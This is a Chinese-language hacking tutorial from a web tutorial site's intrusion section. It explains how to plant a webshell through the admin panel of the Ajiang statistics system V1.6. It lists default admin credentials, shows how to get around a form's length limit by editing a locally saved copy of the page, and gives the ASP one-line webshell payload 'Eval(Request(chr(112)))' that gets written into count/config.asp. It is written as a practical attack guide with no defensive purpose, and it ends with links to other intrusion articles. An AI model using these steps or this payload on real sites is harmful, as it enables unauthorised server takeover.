手机
当前位置:查字典教程网 >网络安全 >黑客入侵 >阿江统计系统V1.6后台拿SHELL的方法
阿江统计系统V1.6后台拿SHELL的方法
摘要:无奈到了自己这里今天下午又碰到个一样的站纠结···不多说了首先感谢小帆同学猪猪同学对程序代码的分析...

无奈到了自己这里今天下午又碰到个一样的站 纠结···

不多说了 首先感谢小帆同学 猪猪同学对程序代码的分析·(我自己硬是整了半个小时没整出来利用方法·)

阿江统计系统V1.6后台拿SHELL的方法1

此后台默认的账号密码是 admin admin ,ITlearnerITlearner

先进后台

阿江统计系统V1.6后台拿SHELL的方法2

来到修改配置界面 保存源文件到本地

本地打开源文件 找到原文章访问量 把maxlength="10 修改为 maxlength="100下边是修改后的截图

阿江统计系统V1.6后台拿SHELL的方法3

然后在本地文件修改action地址 例如IE 中的提交地址是upload/2011/1/201101071923425208.jpg" width="581" onload="resizepic(this)" height="50" alt="" />

然后保存文件 用IE 打开 在网站访问量地址后写入0:Eval(Request(chr(112)))

阿江统计系统V1.6后台拿SHELL的方法4

这个一句话的密码是P点击修改 一句话就被插到了 count/config.asp 这个文件了 打开一句话客户端就可以连接了

阿江统计系统V1.6后台拿SHELL的方法5

只是个自己积累的小小的过程 对于网上关于阿江统计拿SHELL的方法我也测试了很多 但是没几个能成功的 所以专门写了这个文章出来 其实就是本地修改下字节 因为源程序中限制了写入的字节数 没有什么技术含量 不要骂我···

文章作者:冰鱼

【阿江统计系统V1.6后台拿SHELL的方法】相关文章:

浅析Linux系统后门技术和实践方法

记一次前所未有巧妙的Hacking入侵

实例解析80、512、3389等端口的入侵

教你用口令入侵的方法

实例讲解:入侵JSP网站服务器

php 注入 记录一下

详述php渗透全过程(组图)

NT完全入侵教程(新手篇)

黑客技术讲解 网吧入侵方法大搜罗

黑客对Linux操作系统的入侵全过程

精品推荐
分类导航